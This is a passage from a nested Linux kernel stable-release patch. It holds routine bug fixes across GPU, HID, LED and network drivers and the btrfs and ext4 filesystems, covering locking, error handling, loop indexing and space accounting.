++	list_for_each_entry_safe(fence, next_fence, &fman->fence_list, head) {
+ 		if (!list_empty(&fence->seq_passed_actions)) {
+ 			fman->seqno_valid = true;
+ 			vmw_fence_goal_write(fman->dev_priv,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+index abc354ead4e8b..5dcddcb59a6f7 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_overlay.c
+@@ -98,7 +98,7 @@ static int vmw_overlay_send_put(struct vmw_private *dev_priv,
+ {
+ 	struct vmw_escape_video_flush *flush;
+ 	size_t fifo_size;
+-	bool have_so = (dev_priv->active_display_unit == vmw_du_screen_object);
++	bool have_so = (dev_priv->active_display_unit != vmw_du_legacy);
+ 	int i, num_items;
+ 	SVGAGuestPtr ptr;
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+index 6dd33d1258d11..e98fde90f4e0c 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+@@ -1015,6 +1015,32 @@ vmw_stdu_connector_mode_valid(struct drm_connector *connector,
+ 	return MODE_OK;
+ }
+ 
++/*
++ * Trigger a modeset if the X,Y position of the Screen Target changes.
++ * This is needed when multi-mon is cycled. The original Screen Target will have
++ * the same mode but its relative X,Y position in the topology will change.
++ */
++static int vmw_stdu_connector_atomic_check(struct drm_connector *conn,
++					   struct drm_atomic_state *state)
++{
++	struct drm_connector_state *conn_state;
++	struct vmw_screen_target_display_unit *du;
++	struct drm_crtc_state *new_crtc_state;
++
++	conn_state = drm_atomic_get_connector_state(state, conn);
++	du = vmw_connector_to_stdu(conn);
++
++	if (!conn_state->crtc)
++		return 0;
++
++	new_crtc_state = drm_atomic_get_new_crtc_state(state, conn_state->crtc);
++	if (du->base.gui_x != du->base.set_gui_x ||
++	    du->base.gui_y != du->base.set_gui_y)
++		new_crtc_state->mode_changed = true;
++
++	return 0;
++}
++
+ static const struct drm_connector_funcs vmw_stdu_connector_funcs = {
+ 	.dpms = vmw_du_connector_dpms,
+ 	.detect = vmw_du_connector_detect,
+@@ -1029,7 +1055,8 @@ static const struct drm_connector_funcs vmw_stdu_connector_funcs = {
+ static const struct
+ drm_connector_helper_funcs vmw_stdu_connector_helper_funcs = {
+ 	.get_modes = vmw_connector_get_modes,
+-	.mode_valid = vmw_stdu_connector_mode_valid
++	.mode_valid = vmw_stdu_connector_mode_valid,
++	.atomic_check = vmw_stdu_connector_atomic_check,
+ };
+ 
+ 
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_client.c b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+index c751d12f5df89..4343fef7dd83e 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_client.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+@@ -214,7 +214,7 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 	struct device *dev;
+ 	u32 feature_report_size;
+ 	u32 input_report_size;
+-	int rc, i, status;
++	int rc, i;
+ 	u8 cl_idx;
+ 
+ 	req_list = &cl_data->req_list;
+@@ -285,24 +285,27 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 		if (rc)
+ 			goto cleanup;
+ 		mp2_ops->start(privdata, info);
+-		status = amd_sfh_wait_for_response
+-				(privdata, cl_data->sensor_idx[i], SENSOR_ENABLED);
+-		if (status == SENSOR_ENABLED) {
++		cl_data->sensor_sts[i] = amd_sfh_wait_for_response
++						(privdata, cl_data->sensor_idx[i], SENSOR_ENABLED);
++
++		if (cl_data->sensor_sts[i] == SENSOR_ENABLED)
+ 			cl_data->is_any_sensor_enabled = true;
+-			cl_data->sensor_sts[i] = SENSOR_ENABLED;
+-			rc = amdtp_hid_probe(cl_data->cur_hid_dev, cl_data);
+-			if (rc) {
+-				mp2_ops->stop(privdata, cl_data->sensor_idx[i]);
+-				status = amd_sfh_wait_for_response
+-					(privdata, cl_data->sensor_idx[i], SENSOR_DISABLED);
+-				if (status != SENSOR_ENABLED)
+-					cl_data->sensor_sts[i] = SENSOR_DISABLED;
+-				dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
+-					cl_data->sensor_idx[i],
+-					get_sensor_name(cl_data->sensor_idx[i]),
+-					cl_data->sensor_sts[i]);
++	}
++
++	if (!cl_data->is_any_sensor_enabled ||
++	    (mp2_ops->discovery_status && mp2_ops->discovery_status(privdata) == 0)) {
++		dev_warn(dev, "Failed to discover, sensors not enabled is %d\n",
++			 cl_data->is_any_sensor_enabled);
++		rc = -EOPNOTSUPP;
++		goto cleanup;
++	}
++
++	for (i = 0; i < cl_data->num_hid_devices; i++) {
++		cl_data->cur_hid_dev = i;
++		if (cl_data->sensor_sts[i] == SENSOR_ENABLED) {
++			rc = amdtp_hid_probe(i, cl_data);
++			if (rc)
+ 				goto cleanup;
+-			}
+ 		} else {
+ 			cl_data->sensor_sts[i] = SENSOR_DISABLED;
+ 			dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
+@@ -314,27 +317,13 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 			cl_data->sensor_idx[i], get_sensor_name(cl_data->sensor_idx[i]),
+ 			cl_data->sensor_sts[i]);
+ 	}
+-	if (!cl_data->is_any_sensor_enabled ||
+-	   (mp2_ops->discovery_status && mp2_ops->discovery_status(privdata) == 0)) {
+-		amd_sfh_hid_client_deinit(privdata);
+-		for (i = 0; i < cl_data->num_hid_devices; i++) {
+-			devm_kfree(dev, cl_data->feature_report[i]);
+-			devm_kfree(dev, in_data->input_report[i]);
+-			devm_kfree(dev, cl_data->report_descr[i]);
+-		}
+-		dev_warn(dev, "Failed to discover, sensors not enabled is %d\n", cl_data->is_any_sensor_enabled);
+-		return -EOPNOTSUPP;
+-	}
++
+ 	schedule_delayed_work(&cl_data->work_buffer, msecs_to_jiffies(AMD_SFH_IDLE_LOOP));
+ 	return 0;
+ 
+ cleanup:
++	amd_sfh_hid_client_deinit(privdata);
+ 	for (i = 0; i < cl_data->num_hid_devices; i++) {
+-		if (in_data->sensor_virt_addr[i]) {
+-			dma_free_coherent(&privdata->pdev->dev, 8 * sizeof(int),
+-					  in_data->sensor_virt_addr[i],
+-					  cl_data->sensor_dma_addr[i]);
+-		}
+ 		devm_kfree(dev, cl_data->feature_report[i]);
+ 		devm_kfree(dev, in_data->input_report[i]);
+ 		devm_kfree(dev, cl_data->report_descr[i]);
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 53235b276bb24..05e40880e7d46 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -709,13 +709,12 @@ static int wacom_intuos_get_tool_type(int tool_id)
+ 	case 0x8e2: /* IntuosHT2 pen */
+ 	case 0x022:
+ 	case 0x200: /* Pro Pen 3 */
+-	case 0x04200: /* Pro Pen 3 */
+ 	case 0x10842: /* MobileStudio Pro Pro Pen slim */
+ 	case 0x14802: /* Intuos4/5 13HD/24HD Classic Pen */
+ 	case 0x16802: /* Cintiq 13HD Pro Pen */
+ 	case 0x18802: /* DTH2242 Pen */
+ 	case 0x10802: /* Intuos4/5 13HD/24HD General Pen */
+-	case 0x80842: /* Intuos Pro and Cintiq Pro 3D Pen */
++	case 0x8842: /* Intuos Pro and Cintiq Pro 3D Pen */
+ 		tool_type = BTN_TOOL_PEN;
+ 		break;
+ 
+diff --git a/drivers/leds/led-triggers.c b/drivers/leds/led-triggers.c
+index 024b73f84ce0c..3d3673c197e38 100644
+--- a/drivers/leds/led-triggers.c
++++ b/drivers/leds/led-triggers.c
+@@ -193,11 +193,24 @@ int led_trigger_set(struct led_classdev *led_cdev, struct led_trigger *trig)
+ 		spin_unlock(&trig->leddev_list_lock);
+ 		led_cdev->trigger = trig;
+ 
++		/*
++		 * Some activate() calls use led_trigger_event() to initialize
++		 * the brightness of the LED for which the trigger is being set.
++		 * Ensure the led_cdev is visible on trig->led_cdevs for this.
++		 */
++		synchronize_rcu();
++
++		/*
++		 * If "set brightness to 0" is pending in workqueue,
++		 * we don't want that to be reordered after ->activate()
++		 */
++		flush_work(&led_cdev->set_brightness_work);
++
++		ret = 0;
+ 		if (trig->activate)
+ 			ret = trig->activate(led_cdev);
+ 		else
+-			ret = 0;
+-
++			led_set_brightness(led_cdev, trig->brightness);
+ 		if (ret)
+ 			goto err_activate;
+ 
+@@ -268,19 +281,6 @@ void led_trigger_set_default(struct led_classdev *led_cdev)
+ }
+ EXPORT_SYMBOL_GPL(led_trigger_set_default);
+ 
+-void led_trigger_rename_static(const char *name, struct led_trigger *trig)
+-{
+-	/* new name must be on a temporary string to prevent races */
+-	BUG_ON(name == trig->name);
+-
+-	down_write(&triggers_list_lock);
+-	/* this assumes that trig->name was originaly allocated to
+-	 * non constant storage */
+-	strcpy((char *)trig->name, name);
+-	up_write(&triggers_list_lock);
+-}
+-EXPORT_SYMBOL_GPL(led_trigger_rename_static);
+-
+ /* LED Trigger Interface */
+ 
+ int led_trigger_register(struct led_trigger *trig)
+@@ -385,6 +385,8 @@ void led_trigger_event(struct led_trigger *trig,
+ 	if (!trig)
+ 		return;
+ 
++	trig->brightness = brightness;
++
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(led_cdev, &trig->led_cdevs, trig_list)
+ 		led_set_brightness(led_cdev, brightness);
+diff --git a/drivers/leds/trigger/ledtrig-timer.c b/drivers/leds/trigger/ledtrig-timer.c
+index b4688d1d9d2b2..1d213c999d40a 100644
+--- a/drivers/leds/trigger/ledtrig-timer.c
++++ b/drivers/leds/trigger/ledtrig-timer.c
+@@ -110,11 +110,6 @@ static int timer_trig_activate(struct led_classdev *led_cdev)
+ 		led_cdev->flags &= ~LED_INIT_DEFAULT_TRIGGER;
+ 	}
+ 
+-	/*
+-	 * If "set brightness to 0" is pending in workqueue, we don't
+-	 * want that to be reordered after blink_set()
+-	 */
+-	flush_work(&led_cdev->set_brightness_work);
+ 	led_blink_set(led_cdev, &led_cdev->blink_delay_on,
+ 		      &led_cdev->blink_delay_off);
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_txrx.c b/drivers/net/ethernet/intel/ice/ice_txrx.c
+index dbe80e5053a82..bd62781191b3d 100644
+--- a/drivers/net/ethernet/intel/ice/ice_txrx.c
++++ b/drivers/net/ethernet/intel/ice/ice_txrx.c
+@@ -454,7 +454,7 @@ void ice_free_rx_ring(struct ice_rx_ring *rx_ring)
+ 	if (rx_ring->vsi->type == ICE_VSI_PF)
+ 		if (xdp_rxq_info_is_reg(&rx_ring->xdp_rxq))
+ 			xdp_rxq_info_unreg(&rx_ring->xdp_rxq);
+-	rx_ring->xdp_prog = NULL;
++	WRITE_ONCE(rx_ring->xdp_prog, NULL);
+ 	if (rx_ring->xsk_pool) {
+ 		kfree(rx_ring->xdp_buf);
+ 		rx_ring->xdp_buf = NULL;
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index b917f271cdac1..2677d7c86a6d7 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -41,10 +41,8 @@ static void ice_qp_reset_stats(struct ice_vsi *vsi, u16 q_idx)
+ static void ice_qp_clean_rings(struct ice_vsi *vsi, u16 q_idx)
+ {
+ 	ice_clean_tx_ring(vsi->tx_rings[q_idx]);
+-	if (ice_is_xdp_ena_vsi(vsi)) {
+-		synchronize_rcu();
++	if (ice_is_xdp_ena_vsi(vsi))
+ 		ice_clean_tx_ring(vsi->xdp_rings[q_idx]);
+-	}
+ 	ice_clean_rx_ring(vsi->rx_rings[q_idx]);
+ }
+ 
+@@ -172,11 +170,12 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 		usleep_range(1000, 2000);
+ 	}
+ 
++	synchronize_net();
++	netif_tx_stop_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
++
+ 	ice_qvec_dis_irq(vsi, rx_ring, q_vector);
+ 	ice_qvec_toggle_napi(vsi, q_vector, false);
+ 
+-	netif_tx_stop_queue(netdev_get_tx_queue(vsi->netdev, q_idx));
+-
+ 	ice_fill_txq_meta(vsi, tx_ring, &txq_meta);
+ 	err = ice_vsi_stop_tx_ring(vsi, ICE_NO_RESET, 0, tx_ring, &txq_meta);
+ 	if (err)
+@@ -191,10 +190,8 @@ static int ice_qp_dis(struct ice_vsi *vsi, u16 q_idx)
+ 		if (err)
+ 			return err;
+ 	}
+-	err = ice_vsi_ctrl_one_rx_ring(vsi, false, q_idx, true);
+-	if (err)
+-		return err;
+ 
++	ice_vsi_ctrl_one_rx_ring(vsi, false, q_idx, false);
+ 	ice_qp_clean_rings(vsi, q_idx);
+ 	ice_qp_reset_stats(vsi, q_idx);
+ 
+@@ -937,6 +934,10 @@ bool ice_xmit_zc(struct ice_tx_ring *xdp_ring)
+ 
+ 	ice_clean_xdp_irq_zc(xdp_ring);
+ 
++	if (!netif_carrier_ok(xdp_ring->vsi->netdev) ||
++	    !netif_running(xdp_ring->vsi->netdev))
++		return true;
++
+ 	budget = ICE_DESC_UNUSED(xdp_ring);
+ 	budget = min_t(u16, budget, ICE_RING_QUARTER(xdp_ring));
+ 
+@@ -980,7 +981,7 @@ ice_xsk_wakeup(struct net_device *netdev, u32 queue_id,
+ 	struct ice_vsi *vsi = np->vsi;
+ 	struct ice_tx_ring *ring;
+ 
+-	if (test_bit(ICE_VSI_DOWN, vsi->state))
++	if (test_bit(ICE_VSI_DOWN, vsi->state) || !netif_carrier_ok(netdev))
+ 		return -ENETDOWN;
+ 
+ 	if (!ice_is_xdp_ena_vsi(vsi))
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+index 2f80ee84c7ece..bbcdab562513f 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+@@ -953,13 +953,13 @@ static void mvpp2_bm_pool_update_fc(struct mvpp2_port *port,
+ static void mvpp2_bm_pool_update_priv_fc(struct mvpp2 *priv, bool en)
+ {
+ 	struct mvpp2_port *port;
+-	int i;
++	int i, j;
+ 
+ 	for (i = 0; i < priv->port_count; i++) {
+ 		port = priv->port_list[i];
+ 		if (port->priv->percpu_pools) {
+-			for (i = 0; i < port->nrxqs; i++)
+-				mvpp2_bm_pool_update_fc(port, &port->priv->bm_pools[i],
++			for (j = 0; j < port->nrxqs; j++)
++				mvpp2_bm_pool_update_fc(port, &port->priv->bm_pools[j],
+ 							port->tx_fc & en);
+ 		} else {
+ 			mvpp2_bm_pool_update_fc(port, port->pool_long, port->tx_fc & en);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+index ceeb23f478e15..3ee61987266c4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+@@ -1223,7 +1223,12 @@ int mlx5e_ethtool_set_link_ksettings(struct mlx5e_priv *priv,
+ 	if (!an_changes && link_modes == eproto.admin)
+ 		goto out;
+ 
+-	mlx5_port_set_eth_ptys(mdev, an_disable, link_modes, ext);
++	err = mlx5_port_set_eth_ptys(mdev, an_disable, link_modes, ext);
++	if (err) {
++		netdev_err(priv->netdev, "%s: failed to set ptys reg: %d\n", __func__, err);
++		goto out;
++	}
++
+ 	mlx5_toggle_port_link(mdev);
+ 
+ out:
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+index dec1492da74de..1a818759a9aac 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+@@ -145,6 +145,7 @@ int mlx5_fw_reset_set_live_patch(struct mlx5_core_dev *dev)
+ static void mlx5_fw_reset_complete_reload(struct mlx5_core_dev *dev)
+ {
+ 	struct mlx5_fw_reset *fw_reset = dev->priv.fw_reset;
++	struct devlink *devlink = priv_to_devlink(dev);
+ 
+ 	/* if this is the driver that initiated the fw reset, devlink completed the reload */
+ 	if (test_bit(MLX5_FW_RESET_FLAGS_PENDING_COMP, &fw_reset->reset_flags)) {
+@@ -155,9 +156,11 @@ static void mlx5_fw_reset_complete_reload(struct mlx5_core_dev *dev)
+ 			mlx5_core_err(dev, "reset reload flow aborted, PCI reads still not working\n");
+ 		else
+ 			mlx5_load_one(dev, true);
+-		devlink_remote_reload_actions_performed(priv_to_devlink(dev), 0,
++		devl_lock(devlink);
++		devlink_remote_reload_actions_performed(devlink, 0,
+ 							BIT(DEVLINK_RELOAD_ACTION_DRIVER_REINIT) |
+ 							BIT(DEVLINK_RELOAD_ACTION_FW_ACTIVATE));
++		devl_unlock(devlink);
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+index a283d8ae466b6..4b4d761081115 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c
+@@ -1483,7 +1483,7 @@ u8 mlx5_lag_get_slave_port(struct mlx5_core_dev *dev,
+ 		goto unlock;
+ 
+ 	for (i = 0; i < ldev->ports; i++) {
+-		if (ldev->pf[MLX5_LAG_P1].netdev == slave) {
++		if (ldev->pf[i].netdev == slave) {
+ 			port = i;
+ 			break;
+ 		}
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index f83bd15f9e994..b187371fa2f0a 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -4273,7 +4273,8 @@ static netdev_tx_t rtl8169_start_xmit(struct sk_buff *skb,
+ 	if (unlikely(!rtl_tx_slots_avail(tp))) {
+ 		if (net_ratelimit())
+ 			netdev_err(dev, "BUG! Tx Ring full when queue awake!\n");
+-		goto err_stop_0;
++		netif_stop_queue(dev);
++		return NETDEV_TX_BUSY;
+ 	}
+ 
+ 	opts[1] = rtl8169_tx_vlan_tag(skb);
+@@ -4346,11 +4347,6 @@ static netdev_tx_t rtl8169_start_xmit(struct sk_buff *skb,
+ 	dev_kfree_skb_any(skb);
+ 	dev->stats.tx_dropped++;
+ 	return NETDEV_TX_OK;
+-
+-err_stop_0:
+-	netif_stop_queue(dev);
+-	dev->stats.tx_dropped++;
+-	return NETDEV_TX_BUSY;
+ }
+ 
+ static unsigned int rtl_last_frag_len(struct sk_buff *skb)
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+index 5ea9dc251dd9a..ff777735be66b 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+@@ -1825,9 +1825,9 @@ static void axienet_dma_err_handler(struct work_struct *work)
+ 			   ~(XAE_OPTION_TXEN | XAE_OPTION_RXEN));
+ 	axienet_set_mac_address(ndev, NULL);
+ 	axienet_set_multicast_list(ndev);
+-	axienet_setoptions(ndev, lp->options);
+ 	napi_enable(&lp->napi_rx);
+ 	napi_enable(&lp->napi_tx);
++	axienet_setoptions(ndev, lp->options);
+ }
+ 
+ /**
+diff --git a/drivers/net/usb/sr9700.c b/drivers/net/usb/sr9700.c
+index 0a662e42ed965..cb7d2f798fb43 100644
+--- a/drivers/net/usb/sr9700.c
++++ b/drivers/net/usb/sr9700.c
+@@ -179,6 +179,7 @@ static int sr_mdio_read(struct net_device *netdev, int phy_id, int loc)
+ 	struct usbnet *dev = netdev_priv(netdev);
+ 	__le16 res;
+ 	int rc = 0;
++	int err;
+ 
+ 	if (phy_id) {
+ 		netdev_dbg(netdev, "Only internal phy supported\n");
+@@ -189,11 +190,17 @@ static int sr_mdio_read(struct net_device *netdev, int phy_id, int loc)
+ 	if (loc == MII_BMSR) {
+ 		u8 value;
+ 
+-		sr_read_reg(dev, SR_NSR, &value);
++		err = sr_read_reg(dev, SR_NSR, &value);
++		if (err < 0)
++			return err;
++
+ 		if (value & NSR_LINKST)
+ 			rc = 1;
+ 	}
+-	sr_share_read_word(dev, 1, loc, &res);
++	err = sr_share_read_word(dev, 1, loc, &res);
++	if (err < 0)
++		return err;
++
+ 	if (rc == 1)
+ 		res = le16_to_cpu(res) | BMSR_LSTATUS;
+ 	else
+diff --git a/drivers/platform/chrome/cros_ec_proto.c b/drivers/platform/chrome/cros_ec_proto.c
+index 475a6dd72db6b..809fabef3b44a 100644
+--- a/drivers/platform/chrome/cros_ec_proto.c
++++ b/drivers/platform/chrome/cros_ec_proto.c
+@@ -805,9 +805,11 @@ int cros_ec_get_next_event(struct cros_ec_device *ec_dev,
+ 	if (ret == -ENOPROTOOPT) {
+ 		dev_dbg(ec_dev->dev,
+ 			"GET_NEXT_EVENT returned invalid version error.\n");
++		mutex_lock(&ec_dev->lock);
+ 		ret = cros_ec_get_host_command_version_mask(ec_dev,
+ 							EC_CMD_GET_NEXT_EVENT,
+ 							&ver_mask);
++		mutex_unlock(&ec_dev->lock);
+ 		if (ret < 0 || ver_mask == 0)
+ 			/*
+ 			 * Do not change the MKBP supported version if we can't
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 676978f2e9944..e9a0b27e1c4f7 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1065,8 +1065,8 @@ int btrfs_remove_block_group(struct btrfs_trans_handle *trans,
+ 		block_group->space_info->active_total_bytes -= block_group->length;
+ 	block_group->space_info->bytes_readonly -=
+ 		(block_group->length - block_group->zone_unusable);
+-	block_group->space_info->bytes_zone_unusable -=
+-		block_group->zone_unusable;
++	btrfs_space_info_update_bytes_zone_unusable(fs_info, block_group->space_info,
++						    -block_group->zone_unusable);
+ 	block_group->space_info->disk_total -= block_group->length * factor;
+ 
+ 	spin_unlock(&block_group->space_info->lock);
+@@ -1250,7 +1250,8 @@ static int inc_block_group_ro(struct btrfs_block_group *cache, int force)
+ 		if (btrfs_is_zoned(cache->fs_info)) {
+ 			/* Migrate zone_unusable bytes to readonly */
+ 			sinfo->bytes_readonly += cache->zone_unusable;
+-			sinfo->bytes_zone_unusable -= cache->zone_unusable;
++			btrfs_space_info_update_bytes_zone_unusable(cache->fs_info, sinfo,
++								    -cache->zone_unusable);
+ 			cache->zone_unusable = 0;
+ 		}
+ 		cache->ro++;
+@@ -2812,9 +2813,11 @@ void btrfs_dec_block_group_ro(struct btrfs_block_group *cache)
+ 		if (btrfs_is_zoned(cache->fs_info)) {
+ 			/* Migrate zone_unusable bytes back */
+ 			cache->zone_unusable =
+-				(cache->alloc_offset - cache->used) +
++				(cache->alloc_offset - cache->used - cache->pinned -
++				 cache->reserved) +
+ 				(cache->length - cache->zone_capacity);
+-			sinfo->bytes_zone_unusable += cache->zone_unusable;
++			btrfs_space_info_update_bytes_zone_unusable(cache->fs_info, sinfo,
++								    cache->zone_unusable);
+ 			sinfo->bytes_readonly -= cache->zone_unusable;
+ 		}
+ 		num_bytes = cache->length - cache->reserved -
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 0d2cc186974d5..528cd88a77fd7 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -2731,7 +2731,8 @@ static int unpin_extent_range(struct btrfs_fs_info *fs_info,
+ 			readonly = true;
+ 		} else if (btrfs_is_zoned(fs_info)) {
+ 			/* Need reset before reusing in a zoned block group */
+-			space_info->bytes_zone_unusable += len;
++			btrfs_space_info_update_bytes_zone_unusable(fs_info, space_info,
++								    len);
+ 			readonly = true;
+ 		}
+ 		spin_unlock(&cache->lock);
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 862a222caab33..76d52d682b3b0 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -2702,8 +2702,10 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	 * If the block group is read-only, we should account freed space into
+ 	 * bytes_readonly.
+ 	 */
+-	if (!block_group->ro)
++	if (!block_group->ro) {
+ 		block_group->zone_unusable += to_unusable;
++		WARN_ON(block_group->zone_unusable > block_group->length);
++	}
+ 	spin_unlock(&ctl->tree_lock);
+ 	if (!used) {
+ 		spin_lock(&block_group->lock);
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index 8b75f436a9a3c..bede72f3dffc3 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -311,7 +311,7 @@ void btrfs_add_bg_to_space_info(struct btrfs_fs_info *info,
+ 	found->bytes_used += block_group->used;
+ 	found->disk_used += block_group->used * factor;
+ 	found->bytes_readonly += block_group->bytes_super;
+-	found->bytes_zone_unusable += block_group->zone_unusable;
++	btrfs_space_info_update_bytes_zone_unusable(info, found, block_group->zone_unusable);
+ 	if (block_group->length > 0)
+ 		found->full = 0;
+ 	btrfs_try_granting_tickets(info, found);
+diff --git a/fs/btrfs/space-info.h b/fs/btrfs/space-info.h
+index ce66023a9eb8b..99ce3225dd59d 100644
+--- a/fs/btrfs/space-info.h
++++ b/fs/btrfs/space-info.h
+@@ -121,6 +121,7 @@ btrfs_space_info_update_##name(struct btrfs_fs_info *fs_info,		\
+ 
+ DECLARE_SPACE_INFO_UPDATE(bytes_may_use, "space_info");
+ DECLARE_SPACE_INFO_UPDATE(bytes_pinned, "pinned");
++DECLARE_SPACE_INFO_UPDATE(bytes_zone_unusable, "zone_unusable");
+ 
+ int btrfs_init_space_info(struct btrfs_fs_info *fs_info);
+ void btrfs_add_bg_to_space_info(struct btrfs_fs_info *info,
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 67af684e44e6e..5cbe5ae5ad4a2 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -3113,8 +3113,9 @@ static int ext4_zeroout_es(struct inode *inode, struct ext4_extent *ex)
+ 	if (ee_len == 0)
+ 		return 0;
+ 
+-	return ext4_es_insert_extent(inode, ee_block, ee_len, ee_pblock,
+-				     EXTENT_STATUS_WRITTEN);
++	ext4_es_insert_extent(inode, ee_block, ee_len, ee_pblock,
++			      EXTENT_STATUS_WRITTEN);
++	return 0;
+ }
+ 
+ /* FIXME!! we need to try to merge to left or right after zero-out  */
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index 9766d3b21ca2e..592229027af72 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -847,12 +847,10 @@ static int __es_insert_extent(struct inode *inode, struct extent_status *newes,
+ /*
+  * ext4_es_insert_extent() adds information to an inode's extent
+  * status tree.
+- *
+- * Return 0 on success, error code on failure.
+  */
+-int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+-			  ext4_lblk_t len, ext4_fsblk_t pblk,
+-			  unsigned int status)
++void ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
++			   ext4_lblk_t len, ext4_fsblk_t pblk,
++			   unsigned int status)
+ {
+ 	struct extent_status newes;
+ 	ext4_lblk_t end = lblk + len - 1;
+@@ -864,13 +862,13 @@ int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+ 	bool revise_pending = false;
+ 
+ 	if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+-		return 0;
++		return;
+ 
+ 	es_debug("add [%u/%u) %llu %x to extent status tree of inode %lu\n",
+ 		 lblk, len, pblk, status, inode->i_ino);
+ 
+ 	if (!len)
+-		return 0;
++		return;
+ 
+ 	BUG_ON(end < lblk);
+ 
+@@ -939,7 +937,7 @@ int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+ 		goto retry;
+ 
+ 	ext4_es_print_tree(inode);
+-	return 0;
++	return;
+ }
+ 
+ /*
+diff --git a/fs/ext4/extents_status.h b/fs/ext4/extents_status.h
+index 4ec30a7982605..481ec4381bee6 100644
+--- a/fs/ext4/extents_status.h
++++ b/fs/ext4/extents_status.h
+@@ -127,9 +127,9 @@ extern int __init ext4_init_es(void);
+ extern void ext4_exit_es(void);
+ extern void ext4_es_init_tree(struct ext4_es_tree *tree);
+ 
+-extern int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+-				 ext4_lblk_t len, ext4_fsblk_t pblk,
+-				 unsigned int status);
++extern void ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
++				  ext4_lblk_t len, ext4_fsblk_t pblk,
++				  unsigned int status);
+ extern void ext4_es_cache_extent(struct inode *inode, ext4_lblk_t lblk,
+ 				 ext4_lblk_t len, ext4_fsblk_t pblk,
+ 				 unsigned int status);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 2479508deab3b..93a1c22048de6 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -481,6 +481,35 @@ static void ext4_map_blocks_es_recheck(handle_t *handle,
+ }
+ #endif /* ES_AGGRESSIVE_TEST */
+ 
++static int ext4_map_query_blocks(handle_t *handle, struct inode *inode,
